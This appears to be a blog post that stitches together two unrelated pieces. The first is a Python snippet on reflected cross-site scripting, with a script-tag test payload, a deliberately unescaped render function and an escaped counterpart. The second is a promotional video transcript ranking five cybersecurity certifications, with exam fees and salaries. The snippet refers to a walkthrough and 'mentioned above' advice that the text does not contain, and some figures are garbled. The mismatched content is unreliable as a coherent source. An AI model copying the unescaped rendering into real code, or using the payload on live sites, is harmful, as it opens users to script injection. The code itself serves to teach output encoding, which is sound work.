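"""Added example (not from the video): how reflected input ends up in the page,
in the two places the walkthrough touches (the search box's value attribute and
the page text), rendered without and with output encoding. The page template
is constructed for this example."""
import html

# The payload used on this page.
XSS_PAYLOAD = '<script>alert("XSS")</script>'


def render_vulnerable(query: str) -> str:
    """Raw interpolation: whatever the user typed is emitted as markup, so a
    <script> tag in the search text is parsed and run by the browser."""
    return (f'<input name="q" value="{query}">\n'
            f'<p>Results for {query}</p>')


def render_safe(query: str) -> str:
    """Output encoding at the point of insertion. html.escape(quote=True)
    turns <, >, &, " and ' into entities, so the text can neither start a
    tag in the paragraph nor close the quoted value attribute. This is the
    'escape dangerous characters' behaviour mentioned above, applied
    systematically rather than by stripping the word 'script'."""
    safe = html.escape(query, quote=True)
    return (f'<input name="q" value="{safe}">\n'
            f'<p>Results for {safe}</p>')


def has_script_tag(markup: str) -> bool:
    """Test helper: does the rendered HTML still contain a real <script tag?"""
    return "<script" in markup.lower()
```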
Certifications are your best bet. Let's explore the top five certifications that can give you an edge and help you land that dream cyber security job. Now you might be thinking: I am not from an IT background, can certifications really help me? Or maybe you have graduated with a computer science degree and are wondering why bother with certifications. Let me explain why certifications are so powerful. First, if you are from a non-IT background, certifications can open doors you never thought possible. They provide hands-on practical skills that employers value far more than theoretical knowledge; for example, even if you have never written a single line of code, certifications like CompTIA Security+ or Certified Ethical Hacker can teach you the foundational skills needed to land your first job in cyber security. On the other hand, if you are already a computer science graduate, certifications allow you to specialize. Cyber security is a vast field and employers look for specialists in areas like penetration testing, risk management or compliance; a certification like CISSP can turn your general degree into a targeted resume that screams expertise. Here is why certifications are such a game changer: first, they boost your resume by adding instant credibility, showing you have invested in gaining expertise; they also align with industry trends, ensuring your skills match current standards; and they demonstrate your commitment to your career and give you a competitive edge, making you stand out to hiring managers in a crowded job market. So now let us explore the top five certifications that can take your cyber security career to the next level.

Let's begin with the very first certification at the top of the list, Certified Information Systems Security Professional (CISSP), widely regarded as the gold standard in cyber security certification. It is offered by ISC2, one of the most respected organizations in this field. This certification is essential for professionals who want to lead cyber security efforts at an enterprise level. CISSP is a comprehensive certification that covers eight key cyber security domains, such as risk management, security operations and software development security. It is designed for experienced professionals and proves you have the expertise to design, implement and manage a robust cyber security program; organizations worldwide trust CISSP-certified professionals to handle sensitive security needs. Talking about eligibility: to qualify you need at least five years of professional experience in at least two of the eight domains; a bachelor's degree in computer science or equivalent experience is preferred. Even without the full experience you can take the exam and earn the title of Associate while you complete the required work experience. Let's talk about the exam details and cost. The CISSP exam is about six hours long with 250 questions, and the cost of the exam is 61,49 Indian rupees, or around $749 in the US; this is the fee to register and sit for the certification exam. CISSP opens doors to senior roles such as Chief Information Security Officer, who can earn around 76 lakhs per year in India and $150,000 plus per year in the US, and Senior Security Consultant, who can earn around 13 lakhs per year in India and $120,000 per year in the United States. CISSP is more than just a credential; it is a symbol of expertise, leadership and trust in the cyber security world. For anyone serious about advancing in this field, this is the certification you should aim for. Also, if you are looking for specialized training for the CISSP examination, consider Simplilearn's CISSP certification training. This globally acclaimed program is aligned with the latest ISC2 exam pattern, offering comprehensive coverage of all eight domains with live online classes, hands-on labs and expert guidance. With features like simulation tools, test papers and an included CISSP exam voucher, Simplilearn ensures you are exam ready, and their 100% money-back exam pass guarantee adds extra confidence as you work towards elevating your cyber security credentials.

Next on our list is CISA, Certified Information Systems Auditor, a highly respected certification from ISACA focusing on auditing, compliance and risk management. It is perfect for professionals responsible for evaluating and improving an organization's security framework. CISA is recognized worldwide, especially in highly regulated industries like finance, healthcare and government, and it demonstrates expertise in identifying vulnerabilities, ensuring compliance and improving security controls. Let's talk about eligibility: to qualify you need at least 5 years of work experience in IT audit, control or security; a bachelor's degree can waive up to 2 years of this requirement. The exam is 4 hours long with 150 questions testing your knowledge of auditing and compliance. The exam fee is around 47,141 Indian rupees, or $575, for ISACA members; if you are not a member of ISACA, you have to pay 62,000 Indian rupees, or $760 in the USA. Career opportunities and salaries: CISA-certified professionals can secure roles like IT Audit Manager, who can earn around 20 lakhs per year in India and $130,000 per year in the United States, and Compliance Program Manager, who can earn around 24 lakhs per year in India and $140,000 per year in the United States. With organizations increasingly prioritizing governance and compliance, CISA has become a critical certification for professionals in these areas; it is a must-have for those who want to specialize in auditing and risk management. Also, if you want to boost your career in IT auditing and compliance, consider Simplilearn's CISA certification training. As an accredited training partner of ISACA, Simplilearn offers comprehensive preparation including live classes by industry experts, access to the official ISACA learning kit and simulation tests to help you master the 2024 CISA exam. This training provides an up-to-date curriculum and practical insights to help you excel in your career; with an exam pass guarantee and flexible learning options, Simplilearn ensures you are fully prepared to achieve CISA certification and advance your professional journey.

The third certification on the list is Certified Information Security Manager (CISM), another certification from ISACA, aimed at managers and leaders in cyber security. It is ideal for professionals who want to transition into leadership roles. CISM focuses on the strategic and managerial aspects of cyber security, such as governance, incident management and program development, and it is valued by organizations seeking security leaders who can make informed high-level decisions. Eligibility: to qualify you need five years of experience in information security management; a degree or another relevant certification can waive up to 2 years of this requirement. Exam details and cost: the exam is 4 hours long with 150 questions assessing your strategic thinking, and the cost is 47,000 rupees, or $575 in the United States, for ISACA members, and 62,000 rupees, or around $760, for non-members. CISM-certified professionals often step into leadership roles such as Director of Information Security, who can earn around 37 lakhs per year in India and $160,000 per year in the United States, and Data Governance Manager, who can earn around 30 lakhs per year in India and $140,000 per year in the United States. For those aiming to lead cyber security teams and make strategic decisions, CISM provides the credibility and expertise needed to succeed. Also, if you want to elevate your career into a leadership role, Simplilearn's CISM certification training can be your ideal choice: as an ISACA elite training partner, Simplilearn provides a learning kit including the ISACA review manual, Q&A and exam voucher, along with live classes conducted by industry experts, so you can refer to this certification training by Simplilearn.

Let's move on to the fourth on the list, CompTIA Security+, the perfect entry-level certification for building core cyber security skills. It is vendor neutral, which means it is recognized across industries and applies to various technologies. Security+ covers essential topics like network security, threat management and compliance; it is designed to give beginners a strong foundation in cyber security and prepare them for real-world challenges. Eligibility: there are no strict prerequisites, but CompTIA recommends having basic IT experience or earning the Network+ certification first. Exam details and cost: the 90-minute exam includes both multiple-choice questions and performance-based questions, and the registration fee for the exam is 30,000 rupees, or around $370 USD. With Security+ you can pursue roles like Security Engineer, who can earn around 8.2 lakhs per year in India and $95,000 per year in the United States, and Cloud Engineer, who can earn up to six lakhs per year in India and $85,000 per year in the United States. Security+ is an affordable, impactful way to start your cyber security journey, making it an excellent choice for beginners. Also, if you are looking to begin your cyber security career with confidence, consider Simplilearn's CompTIA Security+ certification training. It provides comprehensive coverage of all the exam objectives and focuses on real-world applications to prepare you for industry challenges; additionally, flexible learning options and 24/7 assistance make it an excellent choice for learners worldwide.

Finally we have CEH, Certified Ethical Hacker, the perfect certification for those who dream of thinking like a hacker in order to protect systems. Offered by EC-Council, this credential focuses on the skills needed for penetration testing and ethical hacking. CEH is a hands-on certification that teaches you to identify vulnerabilities, detect attacks and secure systems, and it is a great choice for professionals drawn to ethical hacking and proactive cyber security. Eligibility: to qualify you need two years of experience in information security or completion of EC-Council's official training program. Exam details and cost: the exam is around 4 hours long with 145 multiple-choice questions, and the exam fee is 98,000 rupees, or $1,199 USD. CEH-certified professionals often work as Penetration Testers, who earn an average of around five lakhs per year in India and $85,000 per year in the United States, and Cyber Security Engineers, who can earn 7.3 lakhs per year in India and $100,000 in the United States. CEH is perfect for professionals who want to specialize in offensive security and ethical hacking; it is an exciting certification that paves the way for dynamic, high-impact roles. Also, if you are ready to step into the world of ethical hacking, Simplilearn's CEH v13 certification training is the perfect choice. Accredited by EC-Council, this course includes the official EC-Council courseware with AI-driven tools and an exam voucher; with hands-on labs, live sessions and cutting-edge tools, Simplilearn equips you to excel in penetration testing and more.

That's our course. If you have any doubts or questions, ask them in the comment section below; our team of experts will reply to you as soon as possible. Thank you, and keep learning with Simplilearn. Staying ahead in your career requires continuous learning and upskilling. Whether you are a student aiming to learn today's top skills or a working professional looking to advance your career, we've got you covered: explore our impressive catalog of certification programs in cutting-edge domains including data science, cloud computing, cyber security, AI, machine learning and digital marketing, designed in collaboration with leading universities and top corporations and delivered by industry experts. Choose any of our programs and set yourself on the path to career success. Click the link in the description to know more, and if you liked this video, subscribe to the Simplilearn YouTube channel.

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog